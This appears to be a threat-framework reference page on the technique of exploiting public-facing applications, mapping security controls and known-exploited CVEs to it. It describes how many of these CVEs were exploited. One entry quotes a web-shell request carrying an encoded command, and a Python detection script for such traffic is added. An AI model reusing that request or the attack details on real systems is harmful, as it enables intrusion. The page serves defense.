T1190 Exploit Public-Facing Application

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited, this may also involve Exploitation for Defense Evasion or Exploitation for Client Execution.

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the Cloud Instance Metadata API), exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

CRI Profile Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name

PR.AA-05.03 | Service accounts | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement is for the implementation of security controls for service accounts (i.e., accounts used by systems to access other systems). Use least privilege for service accounts to limit what permissions the exploited process gets on the rest of the system.

PR.AA-05.02 | Privileged system access | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement protects against Exploit Public-Facing Application through the use of privileged account management and the use of multi-factor authentication.

DE.CM-06.02 | Third-party access monitoring | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement protects against Exploit Public-Facing Application through the use of privileged account management. Employing auditing, privileged access management, and just-in-time access protects against adversaries trying to obtain illicit access to critical systems.

PR.PS-06.05 | Testing and validation strategy | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement highlights the use of software security testing, code integrity verification, and vulnerability scanning to mitigate security weaknesses and vulnerabilities in developed code or applications that an adversary may be able to take advantage of.

ID.RA-01.03 | Vulnerability management | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement provides protection from vulnerabilities in exposed applications across the organization through the use of tools that scan for and review vulnerabilities, along with patch management and remediation of those vulnerabilities.

PR.PS-02.01 | Patch identification and application | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement is related to the implementation of a patch management program. Applying patches and upgrades for products and systems provided by vendors mitigates the risk of adversaries exploiting known vulnerabilities. For example, updating software regularly by employing patch management for internal enterprise endpoints and servers can help prevent adversary exploitation of a weakness in an Internet-facing host or system to initially access a network.

PR.PS-06.06 | Vulnerability remediation | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement provides for identifying and remediating vulnerabilities as part of the SDLC. Ensuring software is up to date with the latest security patches helps prevent adversaries from exploiting known vulnerabilities, reducing the risk of successful attacks.

PR.PS-05.02 | Mobile code prevention | Mitigates | T1190 | Exploit Public-Facing Application
Comments: Mobile code procedures address specific actions taken to prevent the development, acquisition, and introduction of unacceptable mobile code within organizational systems, including requiring mobile code to be digitally signed by a trusted source.

DE.CM-03.03 | Privileged account monitoring | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement implements mechanisms and tools to mitigate potential misuse of privileged users and accounts. Continuous monitoring of role and attribute assignments and activity is essential to prevent and detect unauthorized access or misuse.

EX.DD-04.01 | Third-party systems and software evaluation | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement describes the organization's formal process for evaluating externally-sourced applications, software, and firmware by assessing compatibility, security, integrity, and authenticity before deployment and after major changes. For example, requiring vulnerability scanning of third-party application development for common vulnerabilities like SQL injection or cross-site scripting (XSS), including regular scans after major changes to identify newly introduced vulnerabilities.

PR.IR-01.01 | Network segmentation | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement is for the implementation of network segmentation, which helps prevent access to critical systems and sensitive information. Segment externally facing servers and services to mitigate exploitation of public-facing applications.

PR.PS-01.09 | Virtualized end point protection | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement highlights several mechanisms that organizations can implement to protect endpoint systems using virtualization technologies. Virtualization technologies provide a layer of isolation and containment that limits the impact of potential compromises. Application isolation will limit what other processes and system features the exploited target can access, thus aiding with mitigations related to exploiting public-facing applications.

PR.IR-01.06 | Production environment segregation | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement provides protections for production environments. Measures such as network segmentation and access control reduce the attack surface, restrict movement by adversaries, and protect critical assets and data from compromise.

PR.PS-01.08 | End-user device protection | Mitigates | T1190 | Exploit Public-Facing Application
Comments: This diagnostic statement protects against Exploit Public-Facing Application by limiting access to resources to authorized devices only, managing personal computing devices, using network intrusion prevention, and using antimalware.

NIST 800-53 Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name
CA-07 | Continuous Monitoring | mitigates | T1190 | Exploit Public-Facing Application
CM-06 | Configuration Settings | mitigates | T1190 | Exploit Public-Facing Application
CM-05 | Access Restrictions for Change | mitigates | T1190 | Exploit Public-Facing Application
IA-08 | Identification and Authentication (Non-Organizational Users) | mitigates | T1190 | Exploit Public-Facing Application
CA-02 | Control Assessments | mitigates | T1190 | Exploit Public-Facing Application
SC-29 | Heterogeneity | mitigates | T1190 | Exploit Public-Facing Application
RA-10 | Threat Hunting | mitigates | T1190 | Exploit Public-Facing Application
SC-30 | Concealment and Misdirection | mitigates | T1190 | Exploit Public-Facing Application
SC-18 | Mobile Code | mitigates | T1190 | Exploit Public-Facing Application
SC-02 | Separation of System and User Functionality | mitigates | T1190 | Exploit Public-Facing Application
SC-03 | Security Function Isolation | mitigates | T1190 | Exploit Public-Facing Application
SC-39 | Process Isolation | mitigates | T1190 | Exploit Public-Facing Application
SI-02 | Flaw Remediation | mitigates | T1190 | Exploit Public-Facing Application
RA-05 | Vulnerability Monitoring and Scanning | mitigates | T1190 | Exploit Public-Facing Application
CM-08 | System Component Inventory | mitigates | T1190 | Exploit Public-Facing Application
SC-46 | Cross Domain Policy Enforcement | mitigates | T1190 | Exploit Public-Facing Application
SI-10 | Information Input Validation | mitigates | T1190 | Exploit Public-Facing Application
SI-03 | Malicious Code Protection | mitigates | T1190 | Exploit Public-Facing Application
SI-07 | Software, Firmware, and Information Integrity | mitigates | T1190 | Exploit Public-Facing Application
SA-08 | Security and Privacy Engineering Principles | mitigates | T1190 | Exploit Public-Facing Application
IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1190 | Exploit Public-Facing Application
CM-07 | Least Functionality | mitigates | T1190 | Exploit Public-Facing Application
SI-04 | System Monitoring | mitigates | T1190 | Exploit Public-Facing Application
AC-02 | Account Management | mitigates | T1190 | Exploit Public-Facing Application
AC-03 | Access Enforcement | mitigates | T1190 | Exploit Public-Facing Application
AC-04 | Information Flow Enforcement | mitigates | T1190 | Exploit Public-Facing Application
AC-05 | Separation of Duties | mitigates | T1190 | Exploit Public-Facing Application
AC-06 | Least Privilege | mitigates | T1190 | Exploit Public-Facing Application
SC-07 | Boundary Protection | mitigates | T1190 | Exploit Public-Facing Application

Known Exploited Vulnerabilities Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name

CVE-2024-34102 | Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This vulnerability is exploited by sending a crafted XML document that references external entities, with the likely goal of accessing local data.

CVE-2021-22893 | Ivanti Pulse Connect Secure Use-After-Free Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This vulnerability is exploited through an authentication bypass weakness in the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure. Remote attackers leverage this vulnerability to perform remote arbitrary code execution on the Pulse Connect Secure gateway by bypassing authentication controls. The threat actor group UNC2630 has utilized this flaw to harvest login credentials, allowing them to move laterally within affected environments.

CVE-2022-29464 | WSO2 Multiple Products Unrestrictive Upload of File Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: CVE-2022-29464 is an unrestricted file upload vulnerability where an adversary can upload arbitrary files and, due to a directory traversal issue, write files to locations from which they can then send commands. Adversaries have been observed using this to mine cryptocurrency.

CVE-2021-3129 | Laravel Ignition File Upload Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This vulnerability is exploited when a remote unauthorized user sends a malicious payload to a server using an insecure version of Ignition. The payload targets the MakeViewVariableOptionalSolution.php module, leveraging the insecure PHP functions file_get_contents and file_put_contents to specify a file path for executing arbitrary code.

CVE-2021-27860 | FatPipe WARP, IPVPN, and MPVPN Configuration Upload exploit | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: CVE-2021-27860 is a vulnerability in the web management interface in FatPipe software. The vulnerability allowed APT actors to gain access to an unrestricted file upload function to drop a webshell for exploitation activity with root access, leading to elevated privileges and potential follow-on activity. Exploitation of this vulnerability then served as a jumping-off point into other infrastructure for the APT actors.

CVE-2021-22005 | VMware vCenter Server File Upload Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This vulnerability is exploited by an adversary who can access the vCenter Server over the network. The adversary uploads a crafted file to the server's analytics service via port 443, exploiting the file upload vulnerability. This results in remote code execution on the host. Threat actors have been observed leveraging this vulnerability, identified as CVE-2021-22005, using code released by security researcher Jang, to gain unauthorized access to vCenter servers.

CVE-2018-15961 | Adobe ColdFusion Unrestricted File Upload Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application

CVE-2023-48788 | Fortinet FortiClient EMS SQL Injection Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This is an SQL injection vulnerability that can be exploited to execute remote code via specially crafted HTTP requests. Adversaries have been observed using this exploit to deploy tools on the target machine.

CVE-2023-34362 | Progress MOVEit Transfer SQL Injection Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: CVE-2023-34362 is a SQL injection vulnerability in a public-facing application. Adversaries have been observed exploiting this vulnerability to install malicious software on a target system, enabling them to discover system settings and information, enumerate the underlying SQL database, retrieve files, create administrator accounts, and delete accounts.

CVE-2025-25257 | Fortinet FortiWeb SQL Injection Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: Affected versions of FortiWeb contain insufficient input sanitization, allowing an attacker to use SQL injection to write a malicious .pth file into FortiWeb's Python site-packages directory. This allows the malicious code to execute using the privileges granted to Python scripts in that high-level directory.

CVE-2024-21893 | Ivanti Connect Secure, Policy Secure, and Neurons Server-Side Request Forgery (SSRF) Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This vulnerability is exploited through a Server-Side Request Forgery (SSRF) weakness in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA. Attackers leverage this vulnerability to gain unauthorized access by sending a crafted request to the /dana-ws/saml.ws endpoint, which can be accessed without authentication. This manipulation allows attackers to interact with internal services, potentially enabling further exploitation by chaining with other vulnerabilities.

CVE-2021-27103 | Accellion FTA Server-Side Request Forgery (SSRF) Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: CVE-2021-27103 is a server-side request forgery vulnerability in Accellion File Transfer Appliance that allows an adversary to manipulate server requests via a crafted POST request.

CVE-2021-21975 | VMware Server Side Request Forgery in vRealize Operations Manager API | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This Server-Side Request Forgery (SSRF) vulnerability is exploited by an attacker with network access to the VMware server. This vulnerability enables the attacker to exploit an unauthenticated endpoint to send crafted requests to internal or external systems. By doing so, the attacker can potentially steal administrative credentials. Once these credentials are compromised, the attacker could gain maximum privileges within the application, enabling them to alter configurations and intercept sensitive data. This exploitation could lead to unauthorized access and manipulation of the application.

CVE-2021-21973 | VMware vCenter Server and Cloud Foundation Server Side Request Forgery (SSRF) Vulnerability | exploitation_technique | T1190 | Exploit Public-Facing Application
Comments: This vulnerability is exploited through an SSRF (Server Side Request Forgery) flaw in the vSphere Client (HTML5) of VMware's vCenter Server, affecting the vCenter Server plugin. Attackers leverage this vulnerability to gain unauthorized access by sending a crafted POST request to the vCenter Server plugin, thereby bypassing URL validation. This manipulation enables the disclosure of sensitive information. By exploiting this flaw, attackers can scan the company's internal network and retrieve specifics about open ports and services.
                              CVE-2025-34028 Commvault Command Center Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to an issue with deployWebpackage.do, Commvault Command Center is vulnerable to SSRF attacks due to flawed host filtering, which an attacker can exploit to achieve remote code execution using malicious archives with .jsp files in them.
                              References
                              CVE-2023-27524 Apache Superset Insecure Default Initialization of Resource Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who forges a session cookie leveraging user_id or _user_id set to 1 in order to log in as an administrator. A successful exploitation could allow the adversary to gain authenticated access and gain access to unauthorized resources.
                              References
                              CVE-2023-20198 Cisco IOS XE Web UI Privilege Escalation Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through improper access control in the Web User Interface feature of Cisco IOS XE software. Attackers first used this vulnerability to gain initial access by issuing a privilege level 15 command, which allowed them to create a local user account with a password.
                              References
                              CVE-2021-34523 Microsoft Exchange Server Privilege Escalation Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This privilege escalation vulnerability can be exploited by sending a specially crafted HTTP request to the exchange server, is it often chained together with CVE-2021-34473, a remote code execution vulnerability.
                              References
                              CVE-2023-44487 HTTP/2 Rapid Reset Attack Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a 'Rapid Reset' flaw in HTTP/2 endpoints. Attackers initiate this vulnerability by sending a crafted sequence of HTTP requests using HEADERS followed by RST_STREAM frames. This allows them to generate substantial traffic on targeted servers, significantly increasing CPU usage and leading to resource exhaustion without authentication.
                              References
                              CVE-2023-36845 Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a PHP External Variable Modification flaw in the J-Web interface of Juniper Networks Junos OS, affecting EX Series switches and SRX Series firewalls. Attackers leverage this vulnerability to gain initial access by crafting a request that sets the PHPRC variable, thereby altering the PHP execution environment. This manipulation enables the injection and execution of arbitrary code. By exploiting the auto_prepend_file and allow_url_include PHP features, attackers can include a base64 encoded PHP payload using the data:// wrapper. This method allows them to execute code within a confined FreeBSD jail environment, with the potential to escalate privileges by stealing authentication tokens from a user logged into the J-Web application, ultimately enabling unauthorized SSH access with elevated privileges.
                              References
                              CVE-2023-36844 Juniper Junos OS EX Series PHP External Variable Modification Vulnerability primary_impact T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a PHP External Variable Modification flaw in the J-Web component of Juniper Networks Junos OS on EX Series devices. Attackers first use this vulnerability to gain control over certain environment variables by sending a crafted request, which allows them to manipulate these variables without authentication.
                              References
                              CVE-2022-20821 Cisco IOS XR Open Port Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by an unauthenticated, remote user who can access the Redis instance via port 6379 due to a health check RPM issue in IOS XR software. A successful exploitation of this vulnerability could allow an attacker the ability to write to the Redis in-memory database, write arbitrary files to the file system, or retrieve information about the Redis database. This vulnerability has been identified as being exploited in the wild, but specific details have not been released.
                              References
                              CVE-2024-38475 Apache HTTP Server Improper Escaping of Output Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Improper escaping in Apache HTTP Server versions 2.4.59 and before permits code execution or disclosure of source code, as well as session hijacking and a potential full system compromise. An attacker can use a crafted URL to perform a traversal attack to trick the Apache server into reading sensitive files.
                              References
                              CVE-2023-48365 Qlik Sense HTTP Tunneling Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability stems from improper HTTP header validation, if exploited, allows for remote code execution on affected devices.
                              References
                              CVE-2025-35939 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows an attacker to write arbitrary files to a known location on the target server, including potentially malicious files such as PHP scripts by leveraging the fact that Craft CMS creates session files for unauthenticated users at the login page. However, this vulnerability does not, by itself, cause any scripts to be executed or any information to be accessed, so it would need to be chained with another vulnerability in order to achieve code execution.
                              References
                              CVE-2024-4577 PHP-CGI OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2024-4577 is a PHP argument injection vulnerability that allows an adversary to execute arbitrary php commands. Threat actors have been observed utilizing Cobalt Strike and the TaoWu toolkit for post-exploitation activities, such as conducting reconnaisance, establishing persistence, escalating privileges to SYSTEM level, and harvesting credentials.
                              References
                              CVE-2024-21887 Ivanti Connect Secure and Policy Secure Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a command injection weakness in the web components of Ivanti Connect Secure and Ivanti Policy Secure. Attackers leverage this vulnerability to achieve remote code execution by sending specially crafted requests to vulnerable instances, potentially without requiring authentication when combined with other vulnerabilities. This manipulation allows attackers to execute arbitrary commands on the appliance, potentially enabling further exploitation and system compromise. Threat actors have been reported as likely targeting credentials and the deployment of web shells to provide future access.
                              References
                              CVE-2023-20887 Vmware Aria Operations for Networks Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated actor to gain remote code execution via a command injection attack. This vulnerability has been exploited in the wild; however, technical details have not been publicly shared.
                              References
                              CVE-2022-36804 Atlassian Bitbucket Server and Data Center Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows remote attackers with read permissions to a public or private Bitbucket repositories to execute arbitrary code by sending a malicious HTTP request.
                              References
                              CVE-2021-27104 Accellion FTA OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-27104 is an operating system command injection vulnerability in Accellion File Transfer Appliance in that allows an adversary to execute commands by sending a specially crafted POST request to the product's administrative endpoint.
                              References
                              CVE-2021-27102 Accellion FTA OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-27102 is an operating system command execution vulnerability in Accellion File Transfer Appliance that allows an adversary to execute arbitrary commands via a local web service call.
                              References
                              CVE-2023-33246 Apache RocketMQ Command Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who leverages a command injection flaw in Apache RocketMQ versions 5.1 and lower. By using the update configuration function, the adversary can execute commands as the system user under which RocketMQ is running. This lack of permission verification in components like NameServer, Broker, and Controller, which are exposed on the extranet, allows for remote command execution. Additionally, attackers can forge RocketMQ protocol content to achieve the same effect. Since at least June 2023, threat actors have actively exploited this vulnerability to gain initial access and deploy the DreamBus botnet, a Linux-based malware.
                              References
                              CVE-2025-1316 Edimax IC-7100 IP Camera OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
Due to improper input sanitization, the web interface of the Edimax IC-7100 allows a user to send a crafted HTTP request containing malicious commands, which the camera's operating system can be forced to execute.
                              References
                              CVE-2023-27997 Fortinet FortiOS and FortiProxy SSL-VPN Heap-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This buffer overflow vulnerability allows adversaries to remotely execute arbitrary code via specially crafted requests. Adversaries have been observed adding accounts to configuration files.
                              References
                              CVE-2022-42475 Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2022-42475 is a remotely exploitable heap overflow vulnerability. Adversaries have been observed exploiting it to deliver malicious software to the target device; that software has been observed to include anti-debugging and command and control capabilities (over HTTP).
                              References
                              CVE-2022-20708 Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This vulnerability is exploited by bypassing user authentication: a user-supplied string is not properly validated before it is used in a system call. This can grant adversaries root access and the ability to execute arbitrary code.
                              References
                              CVE-2022-20700 Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who sends specific commands to a Cisco router that does not have sufficient authorization enforcement mechanisms in place. This could allow the remote attacker to gain root privileges and execute arbitrary commands on the system.
                              References
                              CVE-2020-29557 D-Link DIR-825 R1 Devices Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2020-29557 is a buffer overflow vulnerability in the web interface that allows attackers to achieve pre-authentication remote code execution. Unidentified threat actors are reported to have actively exploited it, merely two days after public disclosure, to co-opt affected devices into a Mirai-variant botnet used for carrying out DDoS attacks.
                              References
                              CVE-2018-6789 Exim Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2018-6789 is a vulnerability in Exim, an open-source mail transfer agent. This vulnerability, identified as an off-by-one buffer overflow, allows attackers to execute arbitrary code remotely by sending specially crafted messages to the SMTP listener.
                              References
                              CVE-2025-22457 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways products running old versions are susceptible to a stack-based buffer overflow exploit that can lead to remote code execution. The patched versions of each product that remove this vulnerability are as follows: Ivanti Connect Secure (22.7R2.6), Pulse Connect Secure (22.7R2.6), Ivanti Policy Secure (22.7R1.4), and ZTA Gateways (22.8R2.2).
                              References
                              CVE-2025-0282 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This vulnerability in Ivanti products is version-specific, so any reconnaissance effort must return the exact version before exploitation. If exploited, attackers may gain the ability to execute arbitrary code and harvest credentials from the compromised device. Additionally, they may perform internal reconnaissance to find additional devices on the network to compromise.
                              References
                              CVE-2025-42599 Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This stack-based buffer overflow vulnerability in Active! mail allows an unauthenticated attacker to achieve remote code execution or to cause a denial of service by crashing the server.
                              References
                              CVE-2023-7101 Spreadsheet::ParseExcel Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This vulnerability is exploited by a remote attacker by passing unvalidated input from a file into a string-type "eval". Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic. After successful exploitation, the attacker gains the ability to perform remote code execution. This vulnerability has been targeted by Chinese threat actors who exploited the flaw in Spreadsheet::ParseExcel to compromise Barracuda appliances. In collaboration with cybersecurity firm Mandiant, Barracuda assesses that the threat actor behind the attacks is UNC4841, who leveraged the flaw to deploy 'SeaSpy' and 'Saltwater' malware.
                              References
                              CVE-2023-22952 Multiple SugarCRM Products Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This remote code execution (RCE) vulnerability is exploited by an unauthenticated attacker who, via a crafted request, injects custom PHP code through the EmailTemplates module because of missing input validation. Threat actors have exploited it to gain initial access to AWS accounts by injecting PHP code through the SugarCRM email templates module. Attackers leveraged misconfigurations to expand their access, obtaining long-term AWS access keys from compromised EC2 instances. They used tools such as Pacu and Scout Suite to explore AWS services including EC2, IAM, RDS, and S3, and gathered account information via AWS Organizations and the Cost and Usage services. The attackers moved laterally by creating RDS snapshots and new EC2 instances, modifying security groups, and attempting to escalate privileges by logging in as the root user. They also employed defense evasion techniques, including deploying resources in non-standard regions and intermittently stopping EC2 instances to avoid detection and minimize costs. The exploit in question is actively used to compromise hosts by installing a PHP-based web shell. It involves an authentication bypass against the "/index.php" endpoint of the targeted service. Once authentication is bypassed, the attacker obtains a cookie and sends a secondary POST request to "/cache/images/sweet.phar" to upload a small PNG-encoded file containing PHP code. This file acts as a web shell, executing the command supplied in the base64-encoded query argument "c". For example, a request like 'POST /cache/images/sweet.phar?c="L2Jpbi9pZA=="' would execute "/bin/id" with the permissions of the web service's user.
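The web shell traffic described above leaves a distinctive trace in web server access logs: POST requests to a .phar file under the writable /cache/ directory, with the command carried base64-encoded in the "c" query parameter. The following is an added detection example, not code from this page or from SugarCRM; the log lines are constructed for illustration, and the path prefix and parameter name are taken from the description above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache combined format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2023:12:00:01 +0000] "POST /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2023:12:00:03 +0000] "POST /cache/images/sweet.phar HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2023:12:00:05 +0000] "POST /cache/images/sweet.phar?c=L2Jpbi9pZA== HTTP/1.1" 200 87 "-" "curl/7.68.0"
198.51.100.4 - - [10/Jan/2023:12:01:00 +0000] "GET /cache/images/logo.png HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_b64_param(value):
    """Decode a base64 query value (quotes tolerated, as in the reported request);
    return None if it is not valid base64 or not UTF-8 text."""
    try:
        return base64.b64decode(value.strip('"'), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_webshell_hits(log_text, upload_dirs=("/cache/",),
                       script_exts=(".phar", ".php"), cmd_param="c"):
    """Flag requests for PHP code served from an upload/cache directory and decode
    the command parameter when present. Returns one dict per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        path = parts.path.lower()
        # Static assets legitimately live under /cache/; executable PHP does not.
        if not path.startswith(upload_dirs) or not path.endswith(script_exts):
            continue
        command = None
        for value in parse_qs(parts.query).get(cmd_param, []):
            command = decode_b64_param(value)
        hits.append({
            "ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "path": parts.path, "status": int(m["status"]), "command": command,
        })
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit)
```

The upload request itself (no query string) is reported alongside the command requests, so the detection fires at the moment the shell is dropped rather than only once it is used; the decoded command gives the analyst the attacker's first action on the host.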
                              References
                              CVE-2023-0669 Fortra GoAnywhere MFT Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a cross-site request forgery (CSRF) flaw in GoAnywhere's license installation process. Attackers initiate this vulnerability by leveraging the absence of CSRF protection, allowing them to execute remote code without authentication. This enables them to compromise targeted systems, facilitating ransomware attacks and unauthorized access. This vulnerability has been actively exploited, leading to ransomware attacks by the Clop group.
                              References
                              CVE-2022-47966 Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2022-47966 is a remote code execution vulnerability that affects many ManageEngine products due to misconfiguration of security features. Adversaries can use this vulnerability to run arbitrary Java code. APTs have been observed exploiting it to gain access to public-facing applications, establish persistence, and move laterally. They have also been observed creating local user accounts with administrative privileges, using valid but disabled user accounts, deleting logs, and establishing command and control communications, among other post-exploitation activity covered in detailed public reporting.
                              References
                              CVE-2022-42948 Fortra Cobalt Strike User Interface Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated attacker. The vulnerability is caused by improper escaping of HTML tags in Swing components. This flaw allows the attacker to inject crafted HTML code, enabling them to execute code within the Cobalt Strike UI. Exploitation can occur through a graphical file explorer menu, allowing attackers to perform unauthorized operations on the administrative interface.
                              References
                              CVE-2022-35914 Teclib GLPI Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This vulnerability is exploited by a remote, unauthenticated attacker via /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2, which allows PHP code injection. In-the-wild exploitation details have not been publicly released for this vulnerability.
                              References
                              CVE-2022-28810 Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2022-28810 is a vulnerability that exists when custom password sync scripts are enabled: an adversary who passes commands in the password field can achieve remote code execution.
                              References
                              CVE-2022-26501 Veeam Backup & Replication Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated attacker to access internal API functions and send malicious code to the Veeam Distribution Service via the default TCP port 9380. This vulnerability has been exploited by threat actors associated with the AvosLocker ransomware. Kroll analysts have observed these actors using this vulnerability, alongside CVE-2022-26500, to potentially exfiltrate data and download malicious tools while appearing as legitimate activity to evade detection.
                              References
                              CVE-2022-26500 Veeam Backup & Replication Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
